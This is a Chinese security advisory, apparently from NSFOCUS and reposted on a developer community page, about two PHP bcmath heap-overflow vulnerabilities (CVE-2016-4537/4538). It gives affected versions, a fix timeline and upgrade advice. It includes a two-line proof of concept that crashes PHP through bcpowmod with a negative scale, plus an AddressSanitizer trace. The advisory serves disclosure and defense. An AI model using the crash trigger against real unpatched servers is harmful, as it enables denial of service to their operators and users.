AI 助理
备案控制台
开发者社区 安全 文章 正文

PHP DoS漏洞再现 虽然利用难度较高 绿盟科技发出分析和防护方案

2017-09-01 1655
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

www.securityfocus.com 网站发出公告称,PHP中用于二进制计算的模块“bcmath.c”存在多个本地堆溢出漏洞,该漏洞有可能导致 DoS攻击。漏洞CVE编号分别为:CVE-2016-4537和CVE-2016-4538。绿盟科技将此漏洞级别定为 中,意味着影响范围可控,危害程度可控,利用难度较高。

PHP bcmath.c 漏洞危害及影响

CVE-2016-4537漏洞存在于ext/bcmath/bcmath.c库中的bcpowmod函数中,攻击者可以在远程调用该函数的时候故意传入一个负整数参数,从而导致拒绝服务或者其他尚未明确的影响。

CVE-2016-4538漏洞存在于ext/bcmath/bcmath.c库中的bcpowmod函数中,该函数在对特定数据结构做修改的时候未对相应变量进行校验,可以导致攻击者使用精心构造的代码实施拒绝服务攻击或者其他尚未明确的影响。

但绿盟科技安全团队表示

因为漏洞为本地漏洞,不能远程利用,同时不是所有的PHP在编译的时候包含此模块,也不是所有的网站都会用到。

影响的版本

  • PHP版本 < 5.5.35
  • PHP版本 5.6.x < 5.6.21
  • PHP版本 7.x < 7.0.6

不受影响的版本

  • PHP版本 >= 5.5.35
  • PHP版本 5.6.x >= 5.6.21
  • PHP版本 7.x >= 7.0.6

PHP bcmath.c 漏洞发展情况

  1. 2016年4月24日,NULL-LIFE团队的Fernando向PHP官方提交了 PHP“bcmath.c”库中的本地堆溢出漏洞 。具体地址如下:
  2. 2016年4月25日, 官方进行了代码修复 
  3. 2016年8月18日,官方发布了修复漏洞后的最新版本。
  4. 2016年9月9日,绿盟科技安全团队发现www.securityfocus.com 网站对PHP“bcmath.c”多个本地堆溢出漏洞做了更新,其中涉及到的CVE编号分别为:CVE-2016-4537和CVE-2016-4538。

PHP bcmath.c 漏洞防护方案

  • 如果所使用的PHP为受影响的版本,请尽快升级到不受影响的PHP版本。 官方升级地址
  • 使用绿盟科技的远程评估系统(RSAS)对系统进行安全评估。
  • 短期服务:绿盟科技工程师现场处理。确保第一时间消除网络内相关风险点,控制事件影响范围,提供事件分析报告。
  • 中期服务:提供 3-6个月的风险监控与巡检服务。根除风险,确保事件不复发。
  • 长期服务:基于行业业务风险解决方案(威胁情报+攻击溯源+专业安全服务)

PHP bcmath.c是什么

为PHP提供的任意精度数学二进制计算器,该计算器支持的任何大小和精度的数字计算,表示为字符串。

bc是Binary Calculator的缩写。bc*函数的参数都是操作数加上一个可选的 [int scale],比如string bcadd(string $left_operand, string $right_operand[, int $scale]),如果scale没有提供,就用bcscale的缺省值。这里大数直接用一个由0-9组成的string表示,计算结果返回的也是一个 string。

PHP bcmath.c漏洞分析

漏洞的成因是由于文件ext/bcmath/bcmath.c中的bcpowmod函数在接受参数时没有做准确的参数校验,当向参数scale传入一个负数时,有可能造成拒绝服务或者其他未明确的影响。

造成此漏洞的函数是bcpowmod,其声明如下:

该函数的作用是求幂取模,例如下面代码,功能是对x求y次幂,然后求mod的模。

<?php 
$a = bcpowmod($x, $y, $mod); 
?>

第4个参数scale是一个可选参数,当前面参数有小数时,用于指定小数点之后要显示的位数。然而当scale传入的是负数时,可能造成堆溢出引发拒绝服务。

下面是该漏洞的POC:

<?php 
bcpowmod(1, "A", 128, -200);   // 造成堆溢出 
bcpowmod(1, 1.2, 1, 1);    // 后续再次调用此函数时,由于堆结构已被破坏,造成程序崩溃 
?>

程序崩溃时的调用堆栈如下:

AddressSanitizer: heap-buffer-overflow on address 0xb3805f68 at pc 0x083fd271 bp 0xbf91e4d8 sp 0xbf91e4c8 
READ of size 1 at 0xb3805f68 thread T0 
#0 0x83fd270 in bc_divide /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 
#1 0x83fff96 in bc_raisemod /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/raisemod.c:69 
#2 0x83f9923 in zif_bcpowmod /home/fmunozs/phpgit/php56/ext/bcmath/bcmath.c:426 
#3 0x9a7c718 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558 
#4 0x9640316 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363 
#5 0x9a6c9c8 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388 
#6 0x9470b59 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341 
#7 0x91acc6b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613 
#8 0x9a8648a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994 
#9 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378 
#10 0xb6dbe645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645) 
#11 0x808aaba  (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba)

AddressSanitizer: heap-buffer-overflow /home/fmunozs/phpgit/php56/ext/bcmath/libbcmath/src/div.c:122 bc_divide 
Shadow bytes around the buggy address: 
0x36700b90: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700ba0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700bb0: fa fa fd fa fa fa 00 00 fa fa fd fa fa fa fd fa 
0x36700bc0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700bd0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
=> 0x36700be0: fa fa fd fa fa fa fd fa fa fa fd fa fa[fa]fd fa 
0x36700bf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 
0x36700c00: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 00 06 
0x36700c10: fa fa 00 03 fa fa 00 05 fa fa 00 06 fa fa 00 07 
0x36700c20: fa fa 00 00 fa fa 00 07 fa fa 00 00 fa fa 00 05 
0x36700c30: fa fa 00 07 fa fa 00 07 fa fa 00 00 fa fa 00 00

PHP官方对此漏洞的修复如下,在ext/bcmath/bcmath.c文件中引入了一个新的校验函数split_bc_num,并在bcpowmod函数中通过split_bc_num加强了对scale参数的校验。

绿盟科技威胁预警认为该漏洞较难利用

中级:影响范围可控,危害程度可控,利用难度较高,7*8小时内部应急跟踪,72小时内完成技术分析、产品升级和防护方案。

绿盟科技威胁事件定级标准

级别

描述

影响范围比较广,危害严重,利用难度较低,7*24小时内部应急跟踪,24小时内完成技术分析、产品升级和防护方案。

影响范围可控,危害程度可控,利用难度较高,7*8小时内部应急跟踪,72小时内完成技术分析、产品升级和防护方案。

影响较小,危害程度较小。

声 明

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。



原文发布时间:2017年3月24日

本文由:绿盟科技 发布,版权归属于原作者

原文链接:http://toutiao.secjia.com/php-ddos-vulnerability-cve-2016-4537-4538#

本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站

文章标签:
安全
PHP
关键词:
PHP方案
PHP分析
PHP漏洞
DOS漏洞
PHP分析防护方案
晚来风急
目录
相关文章
开发V_I357O98O7I8
|
安全 Java PHP
PHP/JAVA交易所系统开发(成熟案例)丨需求步骤丨指南详细丨方案逻辑丨逻辑教程丨源码功能
An exchange refers to an institution or platform that provides a centralized market for buying and selling transactions, where participants can trade various assets, such as securities, commodities, cryptocurrencies, etc. Exchanges provide market infrastructure and rules to facilitate compliant, saf
开发V_I357O98O7I8
131 0
ShaFaChuang-36210
|
1月前
|
设计模式 SQL 安全
PHP中的设计模式:单例模式的深入探索与实践在PHP开发领域,设计模式是解决常见问题的高效方案集合。它们不是具体的代码,而是一种编码和设计经验的总结。单例模式作为设计模式中的一种,确保了一个类仅有一个实例,并提供一个全局访问点。本文将深入探讨单例模式的基本概念、实现方式及其在PHP中的应用。
单例模式在PHP中的应用广泛,尤其在处理数据库连接、日志记录等场景时,能显著提高资源利用率和执行效率。本文从单例模式的定义出发,详细解释了其在PHP中的不同实现方法,并探讨了使用单例模式的优势与注意事项。通过对示例代码的分析,读者将能够理解如何在PHP项目中有效应用单例模式。
ShaFaChuang-36210
39 2
GG2020gg
|
3月前
|
SQL 安全 API
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
GG2020gg
91 4
终有链响
|
5月前
|
存储 安全 算法
智能合约中Gas限制和DoS攻击漏洞
智能合约中Gas限制和DoS攻击漏洞
终有链响
74 7
今天是几号
|
5月前
|
安全 前端开发 测试技术
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
今天是几号
41 0
土木林森
|
6月前
|
安全 PHP 数据库
【PHP开发专栏】PHP文件包含漏洞与防范
【4月更文挑战第30天】本文探讨了PHP文件包含漏洞,该漏洞让攻击者能执行恶意代码或访问敏感信息。文章分为三部分:原理、影响和防范。文件包含函数(如`include`和`require`)在攻击者控制文件名时可能导致漏洞。影响包括执行恶意代码、泄露敏感信息和影响服务器性能。防范措施包括验证文件名安全性、使用安全包含函数、设置安全包含路径和参数,以及定期更新和维护代码及库。开发者应重视此问题,采取相应措施保障应用安全。
土木林森
130 0
疯狂的猿
|
6月前
|
安全 PHP
零基础学习挖掘PHP网站漏洞
本套课程,分为三个阶段:第一阶段:基础篇 学习PHP开发的基础知识,对PHP常见的漏洞进行分析,第二阶段:进阶篇 实战PHP漏洞靶场,了解市面上的PHP主流网站开发技术,并对市面上的主流框架进行漏洞分析,第三阶段:高级篇 实战演示PHP代码审计技术,并能手动开发PHP框架,了解大型网站的核心技术!
疯狂的猿
60 2
开发V_I357O98O7I8
|
自然语言处理 安全 Java
JAVA丨PHP交易所源码,JAVA/PHP交易所系统开发稳定版/多语言/海外版/多版本/成熟技术/方案详细/逻辑功能/规则案例
Identify requirements and design the system: Clarify your business requirements and design the architecture and functionality of the system. This includes determining the supported transaction types, user authentication, transaction matching engines, order management, fund management, etc.
开发V_I357O98O7I8
130 0
轩公子谈技术
|
安全 PHP 数据安全/隐私保护
PHP审计-实战变量覆盖漏洞
PHP审计-实战变量覆盖漏洞
轩公子谈技术
167 0
漏刻有时
|
关系型数据库 MySQL BI
mysql高级进阶:php语句操作mysql进行最大值、最小值、平均值和中位数的报表导出方案
mysql高级进阶:php语句操作mysql进行最大值、最小值、平均值和中位数的报表导出方案
漏刻有时
144 0

热门文章

最新文章

  • 1
    php-redis扩展模块安装记录
  • 2
    PHP 魔术方法__set() __get() 方法
  • 3
    php安装redis扩展
  • 4
    一个实用的PHP缓存类
  • 5
    php变量的几种写法
  • 6
    PHP关于VC9和VC6以及Thread Safe和Non Thread Safe版本选择的问题
  • 7
    2.6. PHP Classes 类与对象
  • 8
    PHP常用函数
  • 9
    php三维转二维
  • 10
    FAQ系列 | 启用SELinux后,PHP连接MySQL异常
  • 1
    DOS常见命令
    57
  • 2
    智能合约中Gas限制和DoS攻击漏洞
    75
  • 3
    在DOS环境下调试Java程序
    66
  • 4
    网络安全中Dos和linux常用命令总结
    164
  • 5
    【Shell 命令集合 磁盘维护 】Linux 创建MS-DOS文件系统 mkfs.msdos命令使用教程
    94
  • 6
    【Shell 命令集合 磁盘维护 】Linux 创建DOS文件系统 mkdosfs命令使用指南
    90
  • 7
    【Shell 命令集合 磁盘管理 】Linux 于挂入MS-DOS文件系统 mmount 命令使用指南
    93
  • 8
    【Shell 命令集合 磁盘管理 】Linux 设置或者显示MS-DOS文件系统中的卷标 mlabel命令使用教程
    93
  • 9
    Dos的常用指令
    39
  • 10
    BIOS/DOS功能调用:深入解析与代码实践
    226

    • 相关课程

    更多
  • PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段
  • PHP完全自学手册文档教程
  • 互联网安全-移动APP漏洞风险与解决方案
  • 劫持发现、定位以及解决的最佳实践
  • 网络安全攻防 - Web渗透测试
  • 软件用户使用服务及供应商进阶管理

    • 相关电子书

    更多
  • PHP安全开发:从白帽角度做安全
  • PHP 2017.北京 全球开发者大会——高可用的PHP
  • 复杂PHP系统性能瓶颈排查及优化

    • 相关实验场景

    更多
  • 1分钟SAE部署PHP商城小程序
  • 10分钟Serverless部署PHP商城
  • 1分钟代码漏洞自动检测
    • 下一篇
    阿里云OSS设置跨域访问